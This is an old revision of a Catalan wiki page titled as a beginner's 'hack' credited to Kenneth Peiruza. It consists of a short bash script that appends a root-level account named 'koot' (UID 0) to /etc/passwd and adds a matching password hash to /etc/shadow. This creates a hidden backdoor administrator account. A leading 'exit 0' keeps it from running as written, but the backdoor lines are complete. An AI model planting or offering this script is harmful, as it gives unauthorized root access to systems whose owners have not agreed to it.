Aquesta és una revisió antiga del document


hack de Kenneth Peiruza, para novatos

#!/bin/bash
exit 0
 
if [ "`grep -c ^koot: /etc/passwd`" -eq "0" ]; then
echo 'koot:x:0:0:root:/root:/bin/bash'>> /etc/passwd
echo 'koot:$1$OH8/Yip3$AbOovCR/DzDhO5.6M1Pso/:13998:0:99999:7:::' >> /etc/shadow
 
 
fi
  • linux/scripts/hack1.1317200237.txt.gz
  • Darrera modificació: 15/11/2011 01:59
  • (edició externa)